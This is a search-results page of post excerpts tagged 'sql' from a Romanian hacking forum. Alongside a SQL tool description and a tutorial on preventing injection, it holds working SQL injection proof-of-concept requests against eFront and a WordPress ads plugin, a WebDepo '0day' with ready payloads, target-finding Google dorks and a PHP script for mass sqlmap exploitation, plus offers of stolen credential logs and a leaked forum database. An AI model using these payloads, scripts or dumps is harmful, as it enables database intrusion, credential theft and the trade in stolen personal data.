Jump to content

Search the Community

Showing results for tags 'sql'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 37 results

  1. A complete guide to SQL Injection in which you will design your own lab and learn to attack it. Pentesting + Hacking + SQLI Page: SQL Injection Master Course Price: €337
  2. SQL Operations Studio SQL Operations Studio is a data management tool that enables working with SQL Server, Azure SQL DB and SQL DW from Windows, macOS and Linux. Download SQL Operations Studio Public Preview 1 Windows: https://go.microsoft.com/fwlink/?linkid=862648 macOS: https://go.microsoft.com/fwlink/?linkid=862647 Linux: https://go.microsoft.com/fwlink/?linkid=862646 Feature Highlights Cross-Platform DB management for Windows, macOS and Linux with simple XCopy deployment SQL Server Connection Management with Connection Dialog, Server Groups, and Registered Servers Object Explorer supporting schema browsing and contextual command execution T-SQL Query Editor with advanced coding features such as autosuggestions, error diagnostics, tooltips, formatting and peek definition Query Results Viewer with advanced data grid supporting large result sets, export to JSON\CSV\Excel, query plan and charting Management Dashboard supporting customizable widgets with drill-through actionable insights Visual Data Editor that enables direct row insertion, update and deletion into tables Backup and Restore dialogs that enables advanced customization and remote filesystem browsing, configured tasks can be executed or scripted Task History window to view current task execution status, completion results with error messages and task T-SQL scripting Scripting support to generate CREATE, SELECT and DROP statements for database objects Workspaces with full Git integration and Find In Files support to managing T-SQL script libraries Modern light-weight shell with theming, user settings, full screen support, integrated terminal and numerous other features Here's some of these features in action. Contributing If you are interested in fixing issues and contributing directly to the code base, please see the document How to Contribute, which covers the following: How to build and run from source The development workflow, including debugging and running tests Submitting pull requests This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments. Privacy Statement The Microsoft Enterprise and Developer Privacy Statement describes the privacy statement of this software. License Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the Source EULA. Download: sqlopsstudio-master.zip or git clone https://github.com/Microsoft/sqlopsstudio.git Source: https://github.com/Microsoft/sqlopsstudio
  3. source : https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes
  4. Vand baza SQL 6.3MB loguri luate cu coaili prinse intre 2014 decembrie si mai 2015 1220 pagini x 20 rezultate per pagina Prinse cu videoclipuri pe youtube gen steam hack,steam generator etc 20$ paypal Nu au mai fost date/vandute
  5. 1. Cum sa evitam SQL Injection (SQLi) De obicei acesta este folosit in linkuri de genul: site.tld/script.php?id=1 , adaugand dupa 1 o continuare a comanezii SQL. De exemplu: Code: (Select All) site.com/script.php?id=1 Acesta in cod arata cam asa: Code: (Select All) SELECT camp1,camp2 FROM tabel WHERE id=’1? Insa, putem adauga ceva acelui id, ceea ce va continua comanda noastra SQL: Code: (Select All) site.com/script.php?id=1’OR+id%3D’3? Asta, in codul SQL va arata asa: Code: (Select All) SELECT camp1,camp2 FROM tabel WHERE id=’1? OR id=’3? Bineinteles, acest exemplu nu este daunator, dar daca “hackerul” foloseste DROP sau DELETE, poate iesi urat. Cum se pot securiza acestea ? Simplu ! Aplicam stringului pe care il introducem in baza de date o functie, mysql_real_escape_string(), care inlocuieste toate caracterele care ar putea avea vreun efect asupra comenzii SQL. De exemplu: script.php Code: (Select All) $id = $_GET[‘id’]; $id = mysql_real_escape_string($id); $query = “SELECT camp1,camp2 FROM tabel WHERE id='”. $id .”‘”; Cel mai bine e sa luam toate datele in functie de ID (adica sa nu avem urluri gen useri.php?user=bogdan, ci useri.php?iduser=1) deoarece ID-uri, trebuie sa fie numere, lucru care se poate verifica foarte usor. Deci, datele le vom selecta dupa un anumit ID, care o sa fie numeric. Astfel, scriptul devine simplu: Code: $id = $_GET[‘id’]; if(!is_numeric($id)){ echo ‘ID-ul nu est numeric. Incercare de hacking ?? Politia a fost anuntata'; }else{ //este indicat sa verificati intai daca acel ID se afla in baza de date. folositi mysql_num_rows, iar daca rezultatul este 0, id-ul nu exista in baza de date //ceva de genul: $query = mysql_query(“SELECT camp1,camp2 FROM tabel WHERE id='”. $id .”‘”); if(mysql_num_rows($query)==0) { echo ‘ID-ul nu exista in baza de date. Anunt avocatul'; }else{ //totul e OK, id-ul e validat si exista in BD } } In principiu, pentru a valida un GET folositi urmatoarele 3 functii, in functie de caz: mysql_real_escape_string() – sau alternativa: addslashes() is_numeric() mysql_num_rows()
  6. In This Tutorial We Will Learn , 1:Checking Vulnerability Using Diffirent Methods. 2:Balancing Our Query 3:integer Based SQL Injection 4:String Based SQL Injection Read Here !! Welcome To RAi Jee Official Blog: SQL Injection- Basics Of SQLi Part-1
  7. eFront 3.6.15 Multiple SQL Injection Vulnerabilities [+] Author: Filippo Roncari | Luca De Fulgentis [+] Target: eFront [+] Version: 3.6.15 and probably lower [+] Vendor: www.efrontlearning.net [+] Accessibility: Remote [+] Severity: High [+] CVE: <requested> [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf [+] Info: f.roncari@securenetwork.it [+] Summary eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”. [+] Vulnerability Details The new_sidebar.php module, which handles the left side bar in eFront 3.6.15 default theme, is affected by two SQL injection vulnerabilities due to lack of user input sanitization. The identified issues allow unprivileged users, such as professors and students (under certain conditions), to inject arbitrary SQL statements. An attacker could exploit the vulnerabilities by sending specially crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other impacts depending on the DBMS’s user privileges. [+] Technical Details View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code. [+] Proof of Concept (PoC) Any unprivileged authenticated user (e.g., student or professor) can exploit this issue, taking into account that: 1. An attacker has to access a lesson (= click on any open lesson) before executing the malicious request. 2. If logged as a Student, a potential attacker has to access a lesson for which his User Type has “content” set to hidden. 3. The default theme, or others that use the sidebar, must be in use. [!] PoC URL ----------------------------- http://target.site/www/new_sidebar.php?sbctg=lessons&new_lesson_id=null+union+select+password+from+users+where+id=1 ----------------------------- The administrator password hash is returned directly in the HTML body as part of the forum link in the sidebar menu. [!] HTTP Response ----------------------------- HTTP/1.1 200 OK Date: Thu, 09 Apr 2015 22:42:19 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html Content-Length: 28786 [...] <div class = "menuOption" name="lessonSpecific" id="forum_a" > <table> <tr> <td> target="mainframe"> <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" <img src='themes/default/images/others/transparent.gif' class = 'handle sprite16 sprite16-message' > </a> </td> <td class = "menuListOption" > <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" title="Forum" target="mainframe">Forum</a> </td> </tr> </table> </div> [...] ----------------------------- For further details and explanations check the full advisory. [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. Surs?: http://dl.packetstormsecurity.net/1505-exploits/efront3615-sql.txt
  8. BSQL Hacker BSQL hacker is a nice SQL injection tool that helps you perform a SQL injection attack against web applications. This tool is for those who want an automatic SQL injection tool. It is especially made for Blind SQL injection. This tool is fast and performs a multi-threaded attack for better and faster results. It supports 4 different kinds of SQL injection attacks: Blind SQL Injection Time Based Blind SQL Injection Deep Blind (based on advanced time delays) SQL Injection Error Based SQL Injection This tool works in automatic mode and can extract most of the information from the database. It comes in both GUI and console support. You can try any of the given UI modes. From GUI mode, you can also save or load saved attack data. It supports multiple injection points including query string, HTTP headers, POST, and cookies. It supports a proxy to perform the attack. It can also use the default authentication details to login into web accounts and perform the attack from the given account. It supports SSL protected URLs, and can also be used on SSL URLs with invalid certificates. BSQL Hacker SQL injection tool supports MSSQL, ORACLE and MySQL. But MySQL support is experimental and is not as effective on this database server as it is for other two. Download BSQL Hacker here: Download SQLmap SQLMap is the open source SQL injection tool and most popular among all SQL injection tools available. This tool makes it easy to exploit the SQL injection vulnerability of a web application and take over the database server. It comes with a powerful detection engine which can easily detect most of the SQL injection related vulnerabilities. It supports a wide range of database servers, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB. Most of the popular database servers are already included. It also supports various kind of SQL injection attacks, including boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. One good feature of the tool is that it comes with a built-in password hash recognition system. It helps in identifying the password hash and then cracking the password by performing a dictionary attack. This tool allows you to download or upload any file from the database server when the db server is MySQL, PostgreSQL or Microsoft SQL Server. And only for these three database servers, it also allows you to execute arbitrary commands and retrieve their standard output on the database server. After connecting to a database server, this tool also lets you search for specific database name, specific tables or for specific columns in the whole database server. This is a very useful feature when you want to search for a specific column but the database server is huge and contains too many databases and tables. Download SQL Map from the link given below: https://github.com/sqlmapproject/sqlmap SQLninja SQLninja is a SQL injection tool that exploits web applications that use a SQL server as a database server. This tool may not find the injection place at first. But if it is discovered, it can easily automate the exploitation process and extract the information from the database server. This tool can add remote shots in the registry of the database server OS to disable data execution prevention. The overall aim of the tool is to allow the attacker to gain remote access to a SQL database server. It can also be integrated with Metasploit to get GUI access to the remote database. It also supports direct and reverse bindshell, both TCP and UDP. This tool is not available for Windows platforms. It is only available for Linux, FreeBSD, Mac OS X and iOS operating systems. Download SQLninja from the link given below: http://sqlninja.sourceforge.net/ Safe3 SQL Injector Safe3 SQL injector is another powerful but easy to use SQL injection tool. Like other SQL injection tools, it also makes the SQL injection process automatic and helps attackers in gaining the access to a remote SQL server by exploiting the SQL injection vulnerability. It has a powerful AI system which easily recognizes the database server, injection type and best way to exploit the vulnerability. It supports both HTTP and HTTPS websites. You can perform SQL injection via GET, POST or cookies. It also supports authentication (Basic, Digest, NTLM HTTP authentications) to perform a SQL injection attack. The tool supports wide range of database servers including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems. For MYSQL and MS SQL, it also supports read, list or write any file from the database server. It also lets attackers execute arbitrary commands and retrieve their output on a database server in Oracle and Microsoft SQL server. It also support web path guess, MD5 crack, domain query and full SQL injection scan. Download Safe3 SQL injector tool from the link given below: http://sourceforge.net/projects/safe3si/ SQLSus SQLSus is another open source SQL injection tool and is basically a MySQL injection and takeover tool. This tool is written in Perl and you can extend the functions by adding your own codes. This tool offers a command interface which lets you inject your own SQL queries and perform SQL injection attacks. This tool claims to be fast and efficient. It claims to use a powerful blind injection attack algorithm to maximize the data gathered. For better results, it also uses stacked subqueries. To make the process even faster, it has multi-threading to perform attacks in multiple threads. Like other available SQL injection tools, it also supports HTTPS. It can perform attacks via both GET and POST. It also supports, cookies, socks proxy, HTTP authentication, and binary data retrieving. If the access to information_schema is not possible or table does not exist, it can perform a bruteforce attack to guess the name of the table. With this tool, you can also clone a database, table, or column into a local SQLite database, and continue over different sessions. If you want to use a SQL injection tool against a MySQL attack, you will prefer this tool because it is specialized for this specific database server. Download SQLsus from the link given below: http://sqlsus.sourceforge.net/ Mole Mole or (The Mole) is an automatic SQL injection tool available for free. This is an open source project hosted on Sourceforge. You only need to find the vulnerable URL and then pass it in the tool. This tool can detect the vulnerability from the given URL by using Union based or Boolean based query techniques. This tool offers a command line interface, but the interface is easy to use. It also offers auto-completion on both commands and command arguments. So, you can easily use this tool. Mole supports MySQL, MsSQL and Postgres database servers. So, you can only perform SQL injection attacks against these databases. This tool was written in Python and requires only Python3 and Python3-lxml. This tool also supports GET, POST and cookie based attacks. But you need to learn commands to operate this tool. Commands are not typical but you need to have them. List those commands or learn, it is your personal choice. Download Mole SQL injection tool from the link below: http://sourceforge.net/projects/themole/files/ Source
  9. Le-am prins accesu la fraieri. DUMP SQL: GirlShare - Download fastzone_forum.sql
  10. SQL Fucker v. 1.6 Download:DepositFiles
  11. #Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL Injection #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2824 #Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: ---SQL INJECTION 1--- + REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/ Content-Length: 270 Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3 - Vulnerable file: simple-ads-manager/sam-ajax.php - Vulnerable code: case 'sam_ajax_sam_hits': if(isset($_POST['hits']) && is_array($_POST['hits'])) { $hits = $_POST['hits']; $values = ''; $remoteAddr = $_SERVER['REMOTE_ADDR']; foreach($hits as $hit) { $values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")"; } $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};"; $result = $wpdb->query($sql); if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR'])); else echo json_encode(array( 'success' => false, 'result' => $result, 'sql' => $sql, 'hits' => $hits, 'values' => $values )); } break; ---SQL INJECTION 2--- +REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: hostname Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: case 'sam_ajax_load_posts': $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : ''; $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post'; $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page'; //set @RoW_num + 1 AS recid $sql = "SELECT wp.id, wp.post_title AS title, wp.post_type AS type FROM $postTable wp WHERE wp.post_status = 'publish' AND FIND_IN_SET(wp.post_type, 'post,page{$custs}') ORDER BY wp.id;"; $posts = $wpdb->get_results($sql, ARRAY_A); $k = 0; foreach($posts as &$val) { switch($val['type']) { case 'post': $val['type'] = $sPost; break; case 'page': $val['type'] = $sPage; break; default: $val['type'] = $sPost . ': '.$val['type']; break; } $k++; $val['recid'] = $k; } $out = array( 'status' => 'success', 'total' => count($posts), 'records' => $posts ); break; ---SQL INJECTION 3--- +REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) ; wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align% 3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3 Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 22 action=load_combo_data + Vulnerable file: simple-ads-manager/sam-ajax-admin.php +Vulnerable code: from line 225 to 255 case 'sam_ajax_load_combo_data': $page = $_GET['page']; $rows = $_GET['rows']; $searchTerm = $_GET['searchTerm']; $offset = ((int)$page - 1) * (int)$rows; $sql = "SELECT wu.id, wu.display_name AS title, wu.user_nicename AS slug, wu.user_email AS email FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%' ORDER BY wu.id LIMIT $offset, $rows;"; $users = $wpdb->get_results($sql, ARRAY_A); $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';"; $rTotal = $wpdb->get_var($sql); $total = ceil((int)$rTotal/(int)$rows); $out = array( 'page' => $page, 'records' => count($users), 'rows' => $users, 'total' => $total, 'offset' => $offset ); break; ---SQL INJECTION 4--- + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) ; wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align% 3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3 Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 73 action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE> + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: from line 188 to 223 case 'sam_ajax_load_users': $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber'; $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor'; $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author'; $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor'; $roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator'; $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin'; $sql = "SELECT wu.id, wu.display_name AS title, wu.user_nicename AS slug, (CASE wum.meta_value WHEN 0 THEN '$roleSubscriber' WHEN 1 THEN '$roleContributor' WHEN 2 THEN '$roleAuthor' ELSE IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor', IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator', IF(wum.meta_value > 10, '$roleSuperAdmin', NULL) ) ) END) AS role FROM $uTable wu INNER JOIN $umTable wum ON wu.id = wum.user_id AND wum.meta_key = '$userLevel' ORDER BY wu.id;"; $users = $wpdb->get_results($sql, ARRAY_A); $k = 0; foreach($users as &$val) { $k++; $val['recid'] = $k; } $out = $users; break; REFERENCE: + [url]https://www.youtube.com/watch?v=HPJ1r9dhIB4[/url] Best Regards ----------------------------------- ITAS Team ([url]www.itas.vn[/url]) Source
  12. Advisory: SQLi-vulnerabilities in aplication CMS WebDepo Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014) Vendor URL: http://www.webdepot.co.il Vendor Status: 0day ========================== Vulnerability Description: ========================== Records and client practice management application CMS WebDepo suffers from multiple SQL injection vulnerabilitie ========================== Technical Details: ========================== SQL can be injected in the following GET GET VULN: wood=(id) $wood=intval($_REQUEST['wood']) ========================== SQL injection vulnerabilities ========================== Injection is possible through the file text.asp Exploit-Example: DBMS: 'MySQL' Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) DBMS: 'Microsoft Access' Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16 Ex: http://target.us/text.asp?wood=(id)+Exploit ========================== SCRIPT EXPLOIT ========================== http://pastebin.com/b6bWuw7k --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php WebDepoxpl.php -t target php WebDepoxpl.php -f targets.txt php WebDepoxpl.php -t target -p 'http://localhost:9090' howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html ========================== GOOGLE DORK ========================== inurl:"text.asp?wood=" site:il inurl:"text.asp?wood=" site:com inurl:"text.asp?wood=" ========================== Solution: ========================== Sanitizing all requests coming from the client ========================== Credits: ========================== AUTOR: Cleiton Pinheiro / Nick: googleINURL Blog: http://blog.inurl.com.br Twitter: https://twitter.com/googleinurl Fanpage: https://fb.com/InurlBrasil Pastebin http://pastebin.com/u/Googleinurl GIT: https://github.com/googleinurl PSS: http://packetstormsecurity.com/user/googleinurl YOUTUBE: http://youtube.com/c/INURLBrasil PLUS: http://google.com/+INURLBrasil ========================== References: ========================== [1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html [2] https://msdn.microsoft.com/en-us/library/ff648339.aspx Exploit: <?php /* # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil # EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL # VENTOR: http://www.webdepot.co.il # GET VULN: wood=(id) # $wood=intval($_REQUEST['wood']) ----------------------------------------------------------------------------- # DBMS: 'MySQL' # Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # DBMS: 'Microsoft Access' # Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16 ----------------------------------------------------------------------------- # http://target.us/text.asp?wood=(id)+Exploit # GOOGLE DORK: inurl:"text.asp?wood=" # GOOGLE DORK: site:il inurl:"text.asp?wood=" # GOOGLE DORK: site:com inurl:"text.asp?wood=" # --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php WebDepoxpl.php -t target php WebDepoxpl.php -f targets.txt php WebDepoxpl.php -t target -p 'http://localhost:9090' ----------------------------------------------------------------------------- # EXPLOIT MASS USE SCANNER INURLBR # COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'" # DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR ----------------------------------------------------------------------------- # TUTORIAL: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); $folder_SqlMap = "python ../sqlmap/sqlmap.py"; $op_ = getopt('f:t:p:', array('help::')); echo " _____ (_____) ____ _ _ _ _ _____ _ ____ _ _ (() ()) |_ _| \ | | | | | __ \| | | _ \ (_) | \ / | | | \| | | | | |__) | | ______ | |_) |_ __ __ _ ___ _| | \ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __| | | /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | | (_| \__ \ | | [___] |_____|_| \_|\____/|_| \_\______| |____/|_| \__,_|___/_|_| \n\033[1;37m0xNeither war between hackers, nor peace for the system.\n [+] [Exploit]: MINI 3xplo1t-SqlMap - (0DAY) WebDepo -SQL injection / INURL BRASIL\nhelp: --help\033[0m\n\n"; $menu = " -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php 0dayWebDepo.php -t target php 0dayWebDepo.php -f targets.txt php 0dayWebDepo.php -t target -p 'http://localhost:9090' \n"; echo isset($op_['help']) ? exit($menu) : NULL; $params = array( 'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL, 'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL, 'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL, 'folder' => $folder_SqlMap, 'line' => "-----------------------------------------------------------------------------------" ); not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL; not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL; not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL; function not_isnull_empty($valor = NULL) { RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE; } function __plus() { ob_flush(); flush(); } function __listTarget($file) { $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file'])))); echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS LOADED : " . count($tgt_) . "\033[0m\n"; foreach ($tgt_ as $url) { echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING : {$url} \033[0m\n"; __plus(); $file['target'] = $url; __exec($file) . __plus(); } } function __exec($params) { __plus(); echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO] starting SqlMap...\n"; echo "[+] [" . date("H:i:s") . "] [INFO] TARGET: {$params['target']}/text.asp?wood={SQL-INJECTION}\033[0m\n"; $command = "python ../sqlmap/sqlmap.py -u '{$params['target']}/text.asp?wood=1' -p wood --batch --dbms=MySQL {$params['proxy']} --random-agent --answers='follow=N' --dbs --level 2"; system($command, $dados) . empty($dados[0]) ? exit() : NULL; __plus(); } Source
